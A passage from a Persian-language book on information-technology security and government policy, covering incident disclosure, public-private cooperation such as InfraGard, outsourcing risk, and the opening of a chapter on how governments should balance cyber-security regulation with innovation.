‫ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪.‬‬
‫ﺩﻭﻡ‪ ،‬ﺷﻔﺎﻓﻴﺖ ﻭ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ‬
‫ﺍﻳﻤﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﻳﻨﺪﻩ ﺍﻫﻤﻴـﺖ ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ‪ .‬ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ‬
‫ﺍﺷﺎﺭﻩ ﺷﺪ ﻛﻪ ﮔﺎﻫﻲ ﭘﻮﺷﺶ ﺧﺒﺮﻱ ﻭﻗﺎﻳﻊ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻀﺮ ﺑﺎﺷـﺪ‪،‬‬
‫ﭼﺮﺍﻛﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻫﺮﺻﻮﺭﺕ ﺍﺯ ﻣﻄﺒﻮﻋﺎﺕ ﺗـﺄﺛﻴﺮ ﻣـﻲﭘﺬﻳﺮﻧـﺪ‪.‬‬
‫ﺩﺭﻋــﻮﺽ ﺷــﺮﻛﺘﻬﺎ ﺑﺎﻳــﺪ ﻭﺿــﻌﻴﺖ ﺭﺍ ﺑــﺴﺮﻋﺖ ﺍﺻــﻼﺡ ﻛﻨﻨــﺪ‪.‬‬
‫ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺸﻜﻞ ﺑﺎ ﺍﻳﺠﺎﺩ ﻳﻚ ﻃـﺮﺡ ﻋﻤﻠﻴـﺎﺗﻲ‪ ،‬ﺭﺍﻩ ﺑﻬﺘـﺮﻱ‬
‫ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ‪ .‬ﺳﺆﺍﻝ ﻋﻤـﺪﻩﺍﻱ ﻛـﻪ ﺩﺭ‬
‫ﺍﻳﻨﺠﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﭼﻪ ﺣﺪﻱ ﻭ ﺩﺭ ﭼﻪ ﺯﻣـﺎﻧﻲ‬
‫ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ‪ .‬ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ‬
‫ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﭼﻬﺎﺭﻡ‪ ،‬ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻧﻮﻋﻲ ﺗﻌﻬﺪ ﺩﺭ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﻧﻘــﺸﻬﺎ ﻭ ﻣــﺴﺌﻮﻟﻴﺘﻬﺎ ﺑﺎﻳــﺪ ﺗﻌﻴــﻴﻦ ﺷــﻮﻧﺪ؛ ﻭ ﻟــﺬﺍ ﺗــﺪﻭﻳﻦ ﻳــﻚ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺮﺍﻗﺒﺖ ﻭ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻒ ﺍﻣﺎﻧﺘﺪﺍﺭﻱ ﺑﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻜﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳـﺖ‪ .‬ﻋﻨـﺎﻭﻳﻦ‬
‫ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺳﭙﺮﺩﻩﻫـﺎ ﻭ ﺗﺮﺍﻛﻨـﺸﻬﺎ‪ ،‬ﺍﻋﺘﻤـﺎﺩ‬
‫ﻋﻤﻮﻣﻲ‪ ،‬ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‪.‬‬
‫ﺳﻮﻡ‪ ،‬ﺑﻴﺸﺘﺮ ﻛﺸﻮﺭﻫﺎﻱ ﺷـﺮﻛﺖﻛﻨﻨـﺪﻩ ﺑـﻪ ﻟـﺰﻭﻡ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ‬
‫ﻓﺮﺍﺑﺨﺸﻲ ﺗﺄﻛﻴﺪ ﺩﺍﺷﺘﻨﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﺑﺨﺸﻬﺎﻳﻲ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺁﻥ‬
‫ﻣﺜﻤﺮ ﺛﻤﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫـﺴﺘﻨﺪ‪ .‬ﺩﺭ‬
‫ﺍﻳﻦ ﻗﺴﻤﺖ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺟﺎﻣﻌﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨـﺪ‬
‫ﺗﺎ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﺮ ﺑﺨﺶ ﻣﺸﺨﺺ ﺷـﻮﺩ‪ ،EBG .‬ﻳﻜـﻲ ﺍﺯ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ ﻧﻴﺰ ‪ InfraGard‬ﻛﻪ ﻳﻚ‬
‫ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ‪ -‬ﻋﻤﻮﻣﻲ ﻣﺘﻌﻠﻖ ﺑـﻪ ‪ FBI‬ﺍﺳـﺖ ﺩﻭ ﻧﻤﻮﻧـﻪ ﺍﺯ‬
‫ﺍﻳﻦ ﻗﺒﻴﻞ ﻣﺆﺳﺴﺎﺕ ﻫﺴﺘﻨﺪ‪ InfraGard .‬ﺗﻤﺎﻣﻲ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ‬
‫ﺣﻴﺎﺗﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ﻭ ﺣﺪﻭﺩ ‪ ۱۰,۰۰۰‬ﻋﻀﻮ ﺩﺍﺭﺩ‪ .‬ﻫﺪﻑ ﺍﻳﻦ‬
‫ﺳﺎﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﺍﻋﺘﻤﺎﺩ ﻭ ﺗﺸﻮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺍﻋـﻀﺎ‬
‫ﺳﺮﺍﻧﺠﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﻜﻲ ﺍﺯ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ‬
‫ﻣﻬﻢ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺑﻮﺩ‪ .‬ﻧﻤﻮﻧﻪﺍﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ‬
‫ﺯﻣﻴﻨﻪ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺭﺥ ﺩﺍﺩ؛ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﺷـﺮﻛﺖ ﺧـﺪﻣﺎﺕ‬
‫ﻣﻴﺰﺑــﺎﻧﻲ ﻭﺏ ﺩﺭ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﻣــﻮﺭﺩ ﻧﻔــﻮﺫ ﻗــﺮﺍﺭ ﮔﺮﻓــﺖ ﻭ‬
‫ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺶ ﺍﺯ ‪ ۳۰۰‬ﺑﺎﻧـﻚ ﺧﺪﺷـﻪﺩﺍﺭ ﺷـﺪ‪ .‬ﺟﺰﺋﻴـﺎﺕ‬
‫ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ‬
‫ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﻭ ﺳـﺎﻳﺮ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﺩﺭ ﻗـﺴﻤﺖ‬
‫ﺿﻤﺎﺋﻢ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﺧﺎﺗﻤــﻪ ﺧﺎﻃﺮﻧــﺸﺎﻥ ﻣــﻲﻛﻨــﻴﻢ ﻛــﻪ ﺑــﺮﺍﻱ ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﺍﻥ ﻭ‬
‫ﺑﺎﺯﺭﺳﺎﻥ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﭼﺘﺮ ﺗﻘﻨﻴﻨﻲ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻧﺘﻘﺎﻝ ﭘـﻮﻝ‬
‫ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ‪ ،‬ﻣﺜﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻧﻲ ﻭﺏ( ﺍﻣﺮﻱ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ‬
‫ﻓﺼﻞ ‪ .۲‬ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﱵ‬
‫ﻓﺼﻞ ‪ .۳‬ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﱵ ﺑﺮ ﲞﺶ ﺧﺼﻮﺻﻲ‬
‫ﻓﺼﻞ ‪ .۴‬ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﱪ ﺩﻭﻟﺖ‬
‫ﻓﺼﻞ ﺍﻭﻝ‬
‫ﻣﻘﺪﻣﻪ‬
‫ﻣﺸﺎﺑﻪ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺮ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺩﺭ ﻣﻘﻮﻟـﻪ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻧﻴـﺰ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﻧﻘـﺶ ﻣﻬﻤـﻲ ﺍﻳﻔـﺎ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺑﺎﻳﺪ ﺑﺎ ﺍﺣﺘﻴﺎﻁ ﺍﻇﻬﺎﺭ ﻧﻈﺮ ﻛـﺮﺩ‪،‬‬
‫ﭼﺮﺍﻛﻪ ﻳﻚ ﭼـﺎﺭﭼﻮﺏ ﻋﻤـﻮﻣﻲ ﺳﻴﺎﺳـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻣﻨﻴـﺖ ﺭﺍ‬
‫ﺗﻘﻮﻳﺖ ﻛﻨﺪ؛ ﺍﻣﺎ ﺍﺷﻜﺎﻻﺗﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﻣﻘﺮﺭﺍﺕ ﻧﺎﺩﺭﺳـﺖ ﺩﻭﻟﺘـﻲ‬
‫ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﺑﻴﺶ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﭼﻨﻴﻦ ﻣﻘﺮﺭﺍﺗـﻲ ﺍﺳـﺖ‪ .‬ﻓﻨـﺎﻭﺭﻱ‬
‫ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺳﺎﻳﺒﺮ‪ ١‬ﺟﺪﻳﺪ ﺑـﺎ ﭼﻨـﺎﻥ‬
‫ﺳﺮﻋﺘﻲ ﺍﻧﺘﺸﺎﺭ ﻣﻲﻳﺎﺑﻨﺪ ﻛﻪ ﻣﻘﺮﺭﺍﺕ ﺩﻭﻟﺘﻲ ﺑﺮﺍﺣﺘـﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﻮﺍﻧﻌﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺳﺮﻳﻊ ﭘﺎﺳﺨﻬﺎﻱ ﻣﺒﺘﻜﺮﺍﻧـﻪ ﺷـﻮﻧﺪ‪.‬‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻴـﺎﻥ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺗﻘﻨﻴﻨـﻲ ﻭ‬
‫ﻏﻴﺮ ﺗﻘﻨﻴﻨﻲ ﻳﻚ ﻧﻘﻄﺔ ﺗﻌﺎﺩﻝ ﭘﻴـﺪﺍ ﻛﻨـﻴﻢ‪ .‬ﺑـﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ‬
‫ﭼﻨﻴﻦ ﺗﻌﺎﺩﻟﻲ‪ ،‬ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﺑﺮﺧﻲ ﻭﻳﮋﮔﻴﻬـﺎﻱ ﺫﺍﺗـﻲ ﻭ‬
‫ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺟﻪ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑـﺎ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﭘﻴﺸﻴﻦ‪ ،‬ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‪ ٢‬ﻳﻚ ﻓـﻀﺎﻱ ﻏﻴـﺮ‬
‫ﻣﺘﻤﺮﻛﺰ ﺍﺳﺖ‪ .‬ﺑﺨﺸﻲ ﺍﺯ ﻗﺪﺭﺕ ﺍﻳﻨﺘﺮﻧﺖ ﻧﺎﺷﻲ ﺍﺯ ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ‬
‫ﺍﺳﺖ ﻛﻪ ﻓﺎﻗﺪ ﺩﺭﺑﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﻴﺸﺘﺮ ﻛـﺎﺭﺍﻳﻲ ﺁﻥ ﺩﺭ ﻣﺮﺯﻫـﺎﻱ‬
‫ﺷﺒﻜﻪ ﺍﺳﺖ ﺗﺎ ﺩﺭ ﻣﺮﻛﺰ ﺁﻥ‪ .‬ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ﺑﺎﻳﺪ‬
‫ﺍﻳﻦ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻓـﺼﻞ‬
‫ﺳﻠﺴﻠﻪ ﮔﺎﻣﻬﺎﻳﻲ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﻭﻟﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﻭ ﻣﺴﺘﻘﻞ ﺍﺯ ﺗﺼﻤﻴﻤﮕﻴﺮﻳﻬﺎﻱ ﻓﻨﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧـﻮﺩ‬
‫‪٣‬‬
‫ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ‪.‬‬
‫ﺑﺎ ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﻛﺸﻮﺭﻱ ﺑﻪ ﻛﺸﻮﺭ ﺩﻳﮕﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ‪،‬‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﻳﻚ ﺟﺰﺀ ﻳﺎ ﺗﻤﺎﻣﻲ ﺍﺟﺰﺍﻱ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﻬﻢ ﻭ ﺣﺴﺎﺱ ﻛـﻪ ﻣﺒﺘﻨـﻲ‬
‫ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ )ﺑﺎﻧﻜـﺪﺍﺭﻱ‪ ،‬ﺣﻤـﻞ ﻭ ﻧﻘـﻞ‪ ،‬ﺍﻧـﺮﮊﻱ‪،‬‬
‫ﺗﻮﻟﻴﺪ ﻭ ﻏﻴﺮﻩ( ﺗﺤﺖ ﺗﻤﻠـﻚ ﻭ ﻋﻤﻠﻜـﺮﺩ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﻗـﺮﺍﺭ‬
‫‪Cyber Threats‬‬
‫‪Cyberspace‬‬
‫‪۳‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪http://www.abanet.org/abapubs/books/cybercr‬‬
‫‪ime‬‬
‫‪http://www.isn.ethz.ch/crn‬‬
‫‪1‬‬
‫‪2‬‬
‫ﺩﺍﺭﻧﺪ‪ ٤.‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻗﺴﻤﺖ ﺍﻋﻈـﻢ ﻣـﺴﺌﻮﻟﻴﺖ ﻛـﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ‬
‫ﺍﻣﻨﻴﺖ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺍﺳﺖ‪ .‬ﻋﻠﻴﺮﻏﻢ‬
‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ‪ ،‬ﻭﺟﻮﺩ ﻭ ﻛﺎﺭﺍﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺑـﺮﺍﻱ ﺭﻓـﺎﻩ‬
‫ﻻ ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﺍﺳﺖ ﻛـﻪ‬
‫ﻣﻠﻲ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺯ ﺁﻥ ﺍﺳﺘﻘﺒﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻣﻲﺷﻮﺩ ﻭ ﻟﺬﺍ ﺩﻭﻟﺖ ﺑﻪ ﺁﻥ ﺗﻮﺟﻪ ﺯﻳﺎﺩﻱ‬
‫ﻻ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧـﺎﺹ ﺧـﻮﺩ ﺭﺍ‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺩﻭﻟﺘﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺩﺍﺭﻧﺪ؛ ﺍﺯ ﺟﻤﻠﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ‪ ،‬ﺧـﺪﻣﺎﺕ‬
‫ﺍﺿــﻄﺮﺍﺭﻱ‪ ،‬ﺑﻬﺪﺍﺷــﺖ ﻭ ﺳــﺎﻳﺮ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ ﺿــﺮﻭﺭﻱ ﻣــﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﻏﺎﻟﺒﹰﺎ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺧﺼﻮﺻﻲ‬
‫ﻭﺍﺑــﺴﺘﻪﺍﻧــﺪ‪ .‬ﺩﺭ ﻣﺠﻤــﻮﻉ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ ﻫﻤـﺎﻥ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫ﺧﺼﻮﺻﻲ ﻃﺮﺍﺣﻲ ﻭ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻭ ﻟﺬﺍ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺁﻧﻬـﺎ‬
‫ﻳﻜﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﺳﺖ‪.‬‬
‫ﺑﻮﺍﺳﻄﺔ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﺩﻻﻳﻞ‪ ،‬ﻣـﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴـﺖ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﻣﻴﺎﻥ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧـﺼﻮﺻﻲ ﺗﻘـﺴﻴﻢ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﺍﻭﻟﻮﻳﺖ ﺍﻭﻝ‪ ،‬ﺩﻭﻟﺖ ﻣﺴﺌﻮﻟﻴﺖ "ﺗﻨﻈﻴﻢ ﺍﻣﻮﺭ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ" ﺭﺍ ﺑﺮ‬
‫ﻋﻬﺪﻩ ﺩﺍﺭﺩ؛ ﻳﻌﻨﻲ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻱ ﺻﺤﻴﺢ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ‬
‫ﺍﻳﻤﻨﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺑﻜﺎﺭ ﮔﻴﺮﺩ‪ .‬ﺑﻌﻼﻭﻩ ﺍﺯ ﻟﺤﺎﻅ ﺟﻬـﺎﻧﻲ‬
‫ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺩﻭﻟﺖ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﻣﺠـﺎﺯﺍﺕ ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ﺍﺯ‬
‫ﺍﻧﺠــﺎﻡ ﺣﻤــﻼﺕ ﺑــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ‪ ،‬ﻣﺜــﻞ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺍﺯ ﻗﺪﺭﺕ ﻗﻮﺍﻧﻴﻦ ﺣﻘﻮﻕ ﻭ ﺟﺰﺍ ﻛﻤﻚ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﻓﺮﺍﺗﺮ ﺍﺯ ﺁﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺩﻭﻟﺘﻬﺎ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩﺍﻧﺪ ﻛﻪ ﺑـﺮﺍﻱ‬
‫ﺍﺭﺗﻘﺎﻱ ﺭﻭﺍﻟﻬﺎﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬
‫ﺑﺎﻳﺪ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻣﻀﺎﻋﻔﻲ ﺭﺍ ﻣﺘﺤﻤﻞ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺗﻼﺵ ﺑـﺮﺍﻱ‬
‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﻮﺳﻂ ﺩﻭﻟﺖ ﺍﺗﺨﺎﺫ ﺷـﻮﺩ ﻛـﻪ ﺑﺎﻋـﺚ‬
‫ﻧﺸﻮﻧﺪ ﻗﻮﺍﻧﻴﻦ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﻣﺠـﺎﻝ ﻇﻬـﻮﺭ ﺍﺑﺘﻜـﺎﺭﺍﺕ ﻭ‬
‫ﻧﻮﺁﻭﺭﻳﻬﺎ ﺭﺍ ﺑﮕﻴﺮﻧﺪ‪ ،‬ﺑﻠﻜـﻪ ﺩﺭﻋـﻮﺽ ﻣﻨﺠـﺮ ﺑـﻪ ﺣـﺪﺍﻛﺜﺮ ﺷـﺪﻥ‬
‫ﻣﺰﺍﻳﺎﻱ ﺩﺧﺎﻟﺖ ﺩﻭﻟﺖ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﮔﺮﺩﻧـﺪ‪ .‬ﺩﺭ ﻳـﻚ ﻓـﻀﺎﻱ‬
